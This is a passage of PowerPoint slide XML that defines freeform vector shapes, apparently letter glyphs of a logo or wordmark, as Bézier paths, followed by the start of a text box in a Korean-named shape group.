                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25754B2B-5AE0-C54A-8D31-4298DF726C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81005" y="2247256"/>
                <a:ext cx="41670" cy="76395"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 20"/>
                  <a:gd name="T1" fmla="*/ 33 h 36"/>
                  <a:gd name="T2" fmla="*/ 3 w 20"/>
                  <a:gd name="T3" fmla="*/ 33 h 36"/>
                  <a:gd name="T4" fmla="*/ 3 w 20"/>
                  <a:gd name="T5" fmla="*/ 35 h 36"/>
                  <a:gd name="T6" fmla="*/ 0 w 20"/>
                  <a:gd name="T7" fmla="*/ 35 h 36"/>
                  <a:gd name="T8" fmla="*/ 0 w 20"/>
                  <a:gd name="T9" fmla="*/ 0 h 36"/>
                  <a:gd name="T10" fmla="*/ 4 w 20"/>
                  <a:gd name="T11" fmla="*/ 0 h 36"/>
                  <a:gd name="T12" fmla="*/ 4 w 20"/>
                  <a:gd name="T13" fmla="*/ 10 h 36"/>
                  <a:gd name="T14" fmla="*/ 3 w 20"/>
                  <a:gd name="T15" fmla="*/ 14 h 36"/>
                  <a:gd name="T16" fmla="*/ 11 w 20"/>
                  <a:gd name="T17" fmla="*/ 11 h 36"/>
                  <a:gd name="T18" fmla="*/ 20 w 20"/>
                  <a:gd name="T19" fmla="*/ 23 h 36"/>
                  <a:gd name="T20" fmla="*/ 10 w 20"/>
                  <a:gd name="T21" fmla="*/ 36 h 36"/>
                  <a:gd name="T22" fmla="*/ 3 w 20"/>
                  <a:gd name="T23" fmla="*/ 33 h 36"/>
                  <a:gd name="T24" fmla="*/ 16 w 20"/>
                  <a:gd name="T25" fmla="*/ 23 h 36"/>
                  <a:gd name="T26" fmla="*/ 10 w 20"/>
                  <a:gd name="T27" fmla="*/ 14 h 36"/>
                  <a:gd name="T28" fmla="*/ 4 w 20"/>
                  <a:gd name="T29" fmla="*/ 17 h 36"/>
                  <a:gd name="T30" fmla="*/ 4 w 20"/>
                  <a:gd name="T31" fmla="*/ 30 h 36"/>
                  <a:gd name="T32" fmla="*/ 9 w 20"/>
                  <a:gd name="T33" fmla="*/ 32 h 36"/>
                  <a:gd name="T34" fmla="*/ 16 w 20"/>
                  <a:gd name="T35" fmla="*/ 23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" h="36">
                    <a:moveTo>
                      <a:pt x="3" y="33"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="33"/>
                      <a:pt x="3" y="33"/>
                      <a:pt x="3" y="33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6" y="12"/>
                      <a:pt x="8" y="11"/>
                      <a:pt x="11" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="11"/>
                      <a:pt x="20" y="16"/>
                      <a:pt x="20" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="31"/>
                      <a:pt x="15" y="36"/>
                      <a:pt x="10" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="36"/>
                      <a:pt x="5" y="34"/>
                      <a:pt x="3" y="33"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="16" y="23"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="18"/>
                      <a:pt x="14" y="14"/>
                      <a:pt x="10" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="14"/>
                      <a:pt x="6" y="15"/>
                      <a:pt x="4" y="1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6" y="32"/>
                      <a:pt x="8" y="32"/>
                      <a:pt x="9" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="32"/>
                      <a:pt x="16" y="29"/>
                      <a:pt x="16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0" name="Freeform 62">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84CD3473-01D6-234F-B4F4-82D56687D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3510" y="2247256"/>
                <a:ext cx="13890" cy="76395"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 7"/>
                  <a:gd name="T1" fmla="*/ 30 h 36"/>
                  <a:gd name="T2" fmla="*/ 0 w 7"/>
                  <a:gd name="T3" fmla="*/ 0 h 36"/>
                  <a:gd name="T4" fmla="*/ 4 w 7"/>
                  <a:gd name="T5" fmla="*/ 0 h 36"/>
                  <a:gd name="T6" fmla="*/ 4 w 7"/>
                  <a:gd name="T7" fmla="*/ 31 h 36"/>
                  <a:gd name="T8" fmla="*/ 6 w 7"/>
                  <a:gd name="T9" fmla="*/ 32 h 36"/>
                  <a:gd name="T10" fmla="*/ 6 w 7"/>
                  <a:gd name="T11" fmla="*/ 32 h 36"/>
                  <a:gd name="T12" fmla="*/ 7 w 7"/>
                  <a:gd name="T13" fmla="*/ 35 h 36"/>
                  <a:gd name="T14" fmla="*/ 5 w 7"/>
                  <a:gd name="T15" fmla="*/ 36 h 36"/>
                  <a:gd name="T16" fmla="*/ 0 w 7"/>
                  <a:gd name="T1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36">
                    <a:moveTo>
                      <a:pt x="0" y="3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4" y="32"/>
                      <a:pt x="5" y="32"/>
                      <a:pt x="6" y="32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6" y="35"/>
                      <a:pt x="6" y="36"/>
                      <a:pt x="5" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="36"/>
                      <a:pt x="0" y="34"/>
                      <a:pt x="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1" name="Freeform 63">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B5DE751-074F-6948-9712-7B76294228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78235" y="2271563"/>
                <a:ext cx="45141" cy="52089"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 22"/>
                  <a:gd name="T1" fmla="*/ 12 h 25"/>
                  <a:gd name="T2" fmla="*/ 11 w 22"/>
                  <a:gd name="T3" fmla="*/ 0 h 25"/>
                  <a:gd name="T4" fmla="*/ 22 w 22"/>
                  <a:gd name="T5" fmla="*/ 12 h 25"/>
                  <a:gd name="T6" fmla="*/ 11 w 22"/>
                  <a:gd name="T7" fmla="*/ 25 h 25"/>
                  <a:gd name="T8" fmla="*/ 0 w 22"/>
                  <a:gd name="T9" fmla="*/ 12 h 25"/>
                  <a:gd name="T10" fmla="*/ 18 w 22"/>
                  <a:gd name="T11" fmla="*/ 12 h 25"/>
                  <a:gd name="T12" fmla="*/ 11 w 22"/>
                  <a:gd name="T13" fmla="*/ 3 h 25"/>
                  <a:gd name="T14" fmla="*/ 4 w 22"/>
                  <a:gd name="T15" fmla="*/ 12 h 25"/>
                  <a:gd name="T16" fmla="*/ 11 w 22"/>
                  <a:gd name="T17" fmla="*/ 21 h 25"/>
                  <a:gd name="T18" fmla="*/ 18 w 22"/>
                  <a:gd name="T19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5">
                    <a:moveTo>
                      <a:pt x="0" y="12"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="4"/>
                      <a:pt x="5" y="0"/>
                      <a:pt x="11" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="0"/>
                      <a:pt x="22" y="4"/>
                      <a:pt x="22" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="20"/>
                      <a:pt x="16" y="25"/>
                      <a:pt x="11" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="25"/>
                      <a:pt x="0" y="20"/>
                      <a:pt x="0" y="12"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="18" y="12"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="7"/>
                      <a:pt x="15" y="3"/>
                      <a:pt x="11" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="3"/>
                      <a:pt x="4" y="7"/>
                      <a:pt x="4" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="18"/>
                      <a:pt x="7" y="21"/>
                      <a:pt x="11" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="21"/>
                      <a:pt x="18" y="18"/>
                      <a:pt x="1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2" name="Freeform 64">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8A1994C-BFA6-6E49-BA52-D40614145C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0740" y="2271563"/>
                <a:ext cx="38196" cy="52089"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 19"/>
                  <a:gd name="T1" fmla="*/ 12 h 25"/>
                  <a:gd name="T2" fmla="*/ 12 w 19"/>
                  <a:gd name="T3" fmla="*/ 0 h 25"/>
                  <a:gd name="T4" fmla="*/ 19 w 19"/>
                  <a:gd name="T5" fmla="*/ 3 h 25"/>
                  <a:gd name="T6" fmla="*/ 17 w 19"/>
                  <a:gd name="T7" fmla="*/ 5 h 25"/>
                  <a:gd name="T8" fmla="*/ 12 w 19"/>
                  <a:gd name="T9" fmla="*/ 3 h 25"/>
                  <a:gd name="T10" fmla="*/ 4 w 19"/>
                  <a:gd name="T11" fmla="*/ 12 h 25"/>
                  <a:gd name="T12" fmla="*/ 12 w 19"/>
                  <a:gd name="T13" fmla="*/ 21 h 25"/>
                  <a:gd name="T14" fmla="*/ 17 w 19"/>
                  <a:gd name="T15" fmla="*/ 19 h 25"/>
                  <a:gd name="T16" fmla="*/ 19 w 19"/>
                  <a:gd name="T17" fmla="*/ 22 h 25"/>
                  <a:gd name="T18" fmla="*/ 11 w 19"/>
                  <a:gd name="T19" fmla="*/ 25 h 25"/>
                  <a:gd name="T20" fmla="*/ 0 w 19"/>
                  <a:gd name="T21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25">
                    <a:moveTo>
                      <a:pt x="0" y="12"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="4"/>
                      <a:pt x="6" y="0"/>
                      <a:pt x="12" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="0"/>
                      <a:pt x="17" y="1"/>
                      <a:pt x="19" y="3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4"/>
                      <a:pt x="14" y="3"/>
                      <a:pt x="12" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="3"/>
                      <a:pt x="4" y="7"/>
                      <a:pt x="4" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="18"/>
                      <a:pt x="7" y="21"/>
                      <a:pt x="12" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="21"/>
                      <a:pt x="16" y="20"/>
                      <a:pt x="17" y="19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7" y="23"/>
                      <a:pt x="14" y="25"/>
                      <a:pt x="11" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="25"/>
                      <a:pt x="0" y="20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3" name="Freeform 65">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AEA7C87-41D7-7F43-902A-3E521737DC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9774" y="2247256"/>
                <a:ext cx="41670" cy="72924"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 12"/>
                  <a:gd name="T1" fmla="*/ 0 h 21"/>
                  <a:gd name="T2" fmla="*/ 3 w 12"/>
                  <a:gd name="T3" fmla="*/ 0 h 21"/>
                  <a:gd name="T4" fmla="*/ 3 w 12"/>
                  <a:gd name="T5" fmla="*/ 15 h 21"/>
                  <a:gd name="T6" fmla="*/ 3 w 12"/>
                  <a:gd name="T7" fmla="*/ 15 h 21"/>
                  <a:gd name="T8" fmla="*/ 9 w 12"/>
                  <a:gd name="T9" fmla="*/ 7 h 21"/>
                  <a:gd name="T10" fmla="*/ 12 w 12"/>
                  <a:gd name="T11" fmla="*/ 7 h 21"/>
                  <a:gd name="T12" fmla="*/ 7 w 12"/>
                  <a:gd name="T13" fmla="*/ 13 h 21"/>
                  <a:gd name="T14" fmla="*/ 12 w 12"/>
                  <a:gd name="T15" fmla="*/ 21 h 21"/>
                  <a:gd name="T16" fmla="*/ 9 w 12"/>
                  <a:gd name="T17" fmla="*/ 21 h 21"/>
                  <a:gd name="T18" fmla="*/ 5 w 12"/>
                  <a:gd name="T19" fmla="*/ 15 h 21"/>
                  <a:gd name="T20" fmla="*/ 3 w 12"/>
                  <a:gd name="T21" fmla="*/ 18 h 21"/>
                  <a:gd name="T22" fmla="*/ 3 w 12"/>
                  <a:gd name="T23" fmla="*/ 21 h 21"/>
                  <a:gd name="T24" fmla="*/ 0 w 12"/>
                  <a:gd name="T25" fmla="*/ 21 h 21"/>
                  <a:gd name="T26" fmla="*/ 0 w 12"/>
                  <a:gd name="T2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" h="21">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="0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9" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2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4" name="Freeform 66">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{524FD881-70E9-1147-BA16-B88CAF1323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5334" y="2271563"/>
                <a:ext cx="38196" cy="52089"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 18"/>
                  <a:gd name="T1" fmla="*/ 12 h 25"/>
                  <a:gd name="T2" fmla="*/ 11 w 18"/>
                  <a:gd name="T3" fmla="*/ 0 h 25"/>
                  <a:gd name="T4" fmla="*/ 18 w 18"/>
                  <a:gd name="T5" fmla="*/ 3 h 25"/>
                  <a:gd name="T6" fmla="*/ 16 w 18"/>
                  <a:gd name="T7" fmla="*/ 5 h 25"/>
                  <a:gd name="T8" fmla="*/ 11 w 18"/>
                  <a:gd name="T9" fmla="*/ 3 h 25"/>
                  <a:gd name="T10" fmla="*/ 4 w 18"/>
                  <a:gd name="T11" fmla="*/ 12 h 25"/>
                  <a:gd name="T12" fmla="*/ 11 w 18"/>
                  <a:gd name="T13" fmla="*/ 21 h 25"/>
                  <a:gd name="T14" fmla="*/ 17 w 18"/>
                  <a:gd name="T15" fmla="*/ 19 h 25"/>
                  <a:gd name="T16" fmla="*/ 18 w 18"/>
                  <a:gd name="T17" fmla="*/ 22 h 25"/>
                  <a:gd name="T18" fmla="*/ 11 w 18"/>
                  <a:gd name="T19" fmla="*/ 25 h 25"/>
                  <a:gd name="T20" fmla="*/ 0 w 18"/>
                  <a:gd name="T21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25">
                    <a:moveTo>
                      <a:pt x="0" y="12"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="4"/>
                      <a:pt x="5" y="0"/>
                      <a:pt x="11" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="0"/>
                      <a:pt x="16" y="1"/>
                      <a:pt x="18" y="3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4"/>
                      <a:pt x="13" y="3"/>
                      <a:pt x="11" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="3"/>
                      <a:pt x="4" y="7"/>
                      <a:pt x="4" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="18"/>
                      <a:pt x="7" y="21"/>
                      <a:pt x="11" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="21"/>
                      <a:pt x="15" y="20"/>
                      <a:pt x="17" y="1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6" y="23"/>
                      <a:pt x="14" y="25"/>
                      <a:pt x="11" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="25"/>
                      <a:pt x="0" y="20"/>
                      <a:pt x="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5" name="Freeform 67">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8F6AE92-0C4E-044B-BF3B-48BCE75A25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4366" y="2247256"/>
                <a:ext cx="38196" cy="72924"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 19"/>
                  <a:gd name="T1" fmla="*/ 0 h 35"/>
                  <a:gd name="T2" fmla="*/ 4 w 19"/>
                  <a:gd name="T3" fmla="*/ 0 h 35"/>
                  <a:gd name="T4" fmla="*/ 4 w 19"/>
                  <a:gd name="T5" fmla="*/ 10 h 35"/>
                  <a:gd name="T6" fmla="*/ 4 w 19"/>
                  <a:gd name="T7" fmla="*/ 15 h 35"/>
                  <a:gd name="T8" fmla="*/ 12 w 19"/>
                  <a:gd name="T9" fmla="*/ 11 h 35"/>
                  <a:gd name="T10" fmla="*/ 19 w 19"/>
                  <a:gd name="T11" fmla="*/ 20 h 35"/>
                  <a:gd name="T12" fmla="*/ 19 w 19"/>
                  <a:gd name="T13" fmla="*/ 35 h 35"/>
                  <a:gd name="T14" fmla="*/ 15 w 19"/>
                  <a:gd name="T15" fmla="*/ 35 h 35"/>
                  <a:gd name="T16" fmla="*/ 15 w 19"/>
                  <a:gd name="T17" fmla="*/ 21 h 35"/>
                  <a:gd name="T18" fmla="*/ 11 w 19"/>
                  <a:gd name="T19" fmla="*/ 14 h 35"/>
                  <a:gd name="T20" fmla="*/ 4 w 19"/>
                  <a:gd name="T21" fmla="*/ 18 h 35"/>
                  <a:gd name="T22" fmla="*/ 4 w 19"/>
                  <a:gd name="T23" fmla="*/ 35 h 35"/>
                  <a:gd name="T24" fmla="*/ 0 w 19"/>
                  <a:gd name="T25" fmla="*/ 35 h 35"/>
                  <a:gd name="T26" fmla="*/ 0 w 19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35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3"/>
                      <a:pt x="9" y="11"/>
                      <a:pt x="12" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="11"/>
                      <a:pt x="19" y="14"/>
                      <a:pt x="19" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="35"/>
                      <a:pt x="19" y="35"/>
                      <a:pt x="19" y="35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16"/>
                      <a:pt x="14" y="14"/>
                      <a:pt x="11" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="14"/>
                      <a:pt x="7" y="15"/>
                      <a:pt x="4" y="18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0" y="35"/>
                      <a:pt x="0" y="35"/>
                      <a:pt x="0" y="35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6" name="Freeform 68">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C1F41A9-1122-894D-8789-588C90915C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76871" y="2271563"/>
                <a:ext cx="38196" cy="52089"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 19"/>
                  <a:gd name="T1" fmla="*/ 18 h 25"/>
                  <a:gd name="T2" fmla="*/ 15 w 19"/>
                  <a:gd name="T3" fmla="*/ 9 h 25"/>
                  <a:gd name="T4" fmla="*/ 10 w 19"/>
                  <a:gd name="T5" fmla="*/ 3 h 25"/>
                  <a:gd name="T6" fmla="*/ 3 w 19"/>
                  <a:gd name="T7" fmla="*/ 6 h 25"/>
                  <a:gd name="T8" fmla="*/ 1 w 19"/>
                  <a:gd name="T9" fmla="*/ 3 h 25"/>
                  <a:gd name="T10" fmla="*/ 10 w 19"/>
                  <a:gd name="T11" fmla="*/ 0 h 25"/>
                  <a:gd name="T12" fmla="*/ 19 w 19"/>
                  <a:gd name="T13" fmla="*/ 9 h 25"/>
                  <a:gd name="T14" fmla="*/ 19 w 19"/>
                  <a:gd name="T15" fmla="*/ 24 h 25"/>
                  <a:gd name="T16" fmla="*/ 15 w 19"/>
                  <a:gd name="T17" fmla="*/ 24 h 25"/>
                  <a:gd name="T18" fmla="*/ 15 w 19"/>
                  <a:gd name="T19" fmla="*/ 21 h 25"/>
                  <a:gd name="T20" fmla="*/ 15 w 19"/>
                  <a:gd name="T21" fmla="*/ 21 h 25"/>
                  <a:gd name="T22" fmla="*/ 7 w 19"/>
                  <a:gd name="T23" fmla="*/ 25 h 25"/>
                  <a:gd name="T24" fmla="*/ 0 w 19"/>
                  <a:gd name="T25" fmla="*/ 18 h 25"/>
                  <a:gd name="T26" fmla="*/ 15 w 19"/>
                  <a:gd name="T27" fmla="*/ 18 h 25"/>
                  <a:gd name="T28" fmla="*/ 15 w 19"/>
                  <a:gd name="T29" fmla="*/ 12 h 25"/>
                  <a:gd name="T30" fmla="*/ 4 w 19"/>
                  <a:gd name="T31" fmla="*/ 18 h 25"/>
                  <a:gd name="T32" fmla="*/ 8 w 19"/>
                  <a:gd name="T33" fmla="*/ 21 h 25"/>
                  <a:gd name="T34" fmla="*/ 15 w 19"/>
                  <a:gd name="T3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" h="25">
                    <a:moveTo>
                      <a:pt x="0" y="18"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="13"/>
                      <a:pt x="5" y="10"/>
                      <a:pt x="15" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="6"/>
                      <a:pt x="14" y="3"/>
                      <a:pt x="10" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="3"/>
                      <a:pt x="5" y="4"/>
                      <a:pt x="3" y="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1"/>
                      <a:pt x="7" y="0"/>
                      <a:pt x="10" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="0"/>
                      <a:pt x="19" y="4"/>
                      <a:pt x="19" y="9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3" y="23"/>
                      <a:pt x="10" y="25"/>
                      <a:pt x="7" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="25"/>
                      <a:pt x="0" y="22"/>
                      <a:pt x="0" y="18"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="15" y="18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7" y="13"/>
                      <a:pt x="4" y="15"/>
                      <a:pt x="4" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="20"/>
                      <a:pt x="6" y="21"/>
                      <a:pt x="8" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="21"/>
                      <a:pt x="12" y="20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7" name="Freeform 69">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{703A0070-41C9-6F46-B711-07496D9322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39376" y="2250728"/>
                <a:ext cx="10416" cy="69450"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 6"/>
                  <a:gd name="T1" fmla="*/ 3 h 34"/>
                  <a:gd name="T2" fmla="*/ 3 w 6"/>
                  <a:gd name="T3" fmla="*/ 0 h 34"/>
                  <a:gd name="T4" fmla="*/ 6 w 6"/>
                  <a:gd name="T5" fmla="*/ 3 h 34"/>
                  <a:gd name="T6" fmla="*/ 3 w 6"/>
                  <a:gd name="T7" fmla="*/ 5 h 34"/>
                  <a:gd name="T8" fmla="*/ 0 w 6"/>
                  <a:gd name="T9" fmla="*/ 3 h 34"/>
                  <a:gd name="T10" fmla="*/ 1 w 6"/>
                  <a:gd name="T11" fmla="*/ 10 h 34"/>
                  <a:gd name="T12" fmla="*/ 5 w 6"/>
                  <a:gd name="T13" fmla="*/ 10 h 34"/>
                  <a:gd name="T14" fmla="*/ 5 w 6"/>
                  <a:gd name="T15" fmla="*/ 34 h 34"/>
                  <a:gd name="T16" fmla="*/ 1 w 6"/>
                  <a:gd name="T17" fmla="*/ 34 h 34"/>
                  <a:gd name="T18" fmla="*/ 1 w 6"/>
                  <a:gd name="T19" fmla="*/ 1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4">
                    <a:moveTo>
                      <a:pt x="0" y="3"/>
                    </a:move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6" y="1"/>
                      <a:pt x="6" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6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lose/>
                    <a:moveTo>
                      <a:pt x="1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" y="34"/>
                      <a:pt x="1" y="34"/>
                      <a:pt x="1" y="34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8" name="Freeform 70">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5C96628-E8AA-854D-9BB0-6BEC603FB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4101" y="2271563"/>
                <a:ext cx="38196" cy="48615"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 19"/>
                  <a:gd name="T1" fmla="*/ 0 h 24"/>
                  <a:gd name="T2" fmla="*/ 4 w 19"/>
                  <a:gd name="T3" fmla="*/ 0 h 24"/>
                  <a:gd name="T4" fmla="*/ 4 w 19"/>
                  <a:gd name="T5" fmla="*/ 4 h 24"/>
                  <a:gd name="T6" fmla="*/ 4 w 19"/>
                  <a:gd name="T7" fmla="*/ 4 h 24"/>
                  <a:gd name="T8" fmla="*/ 12 w 19"/>
                  <a:gd name="T9" fmla="*/ 0 h 24"/>
                  <a:gd name="T10" fmla="*/ 19 w 19"/>
                  <a:gd name="T11" fmla="*/ 9 h 24"/>
                  <a:gd name="T12" fmla="*/ 19 w 19"/>
                  <a:gd name="T13" fmla="*/ 24 h 24"/>
                  <a:gd name="T14" fmla="*/ 15 w 19"/>
                  <a:gd name="T15" fmla="*/ 24 h 24"/>
                  <a:gd name="T16" fmla="*/ 15 w 19"/>
                  <a:gd name="T17" fmla="*/ 10 h 24"/>
                  <a:gd name="T18" fmla="*/ 11 w 19"/>
                  <a:gd name="T19" fmla="*/ 3 h 24"/>
                  <a:gd name="T20" fmla="*/ 4 w 19"/>
                  <a:gd name="T21" fmla="*/ 7 h 24"/>
                  <a:gd name="T22" fmla="*/ 4 w 19"/>
                  <a:gd name="T23" fmla="*/ 24 h 24"/>
                  <a:gd name="T24" fmla="*/ 0 w 19"/>
                  <a:gd name="T25" fmla="*/ 24 h 24"/>
                  <a:gd name="T26" fmla="*/ 0 w 19"/>
                  <a:gd name="T2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24">
                    <a:moveTo>
                      <a:pt x="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6" y="2"/>
                      <a:pt x="9" y="0"/>
                      <a:pt x="12" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="0"/>
                      <a:pt x="19" y="3"/>
                      <a:pt x="19" y="9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5"/>
                      <a:pt x="14" y="3"/>
                      <a:pt x="11" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="3"/>
                      <a:pt x="7" y="4"/>
                      <a:pt x="4" y="7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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="372" name="그룹 144">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B0A950B-136E-4E4C-B716-71E92AE1F6D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3826117" y="3174600"/>
            <a:ext cx="1491767" cy="576162"/>
            <a:chOff x="3266125" y="3174600"/>
            <a:chExt cx="1491767" cy="576162"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="373" name="TextBox 372">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D891D91C-88C7-3942-8037-DFD1FED9670A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3266125" y="3174600"/>
              <a:ext cx="351352" cy="576162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r" defTabSz="914400" latinLnBrk="1">
                <a:lnSpc>
                  <a:spcPts val="1400"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buNone/>
                <a:defRPr sz="800" b="1">
                  <a:solidFill>
                    <a:srgbClr val="3E3A39"/>
                  </a:solidFill>
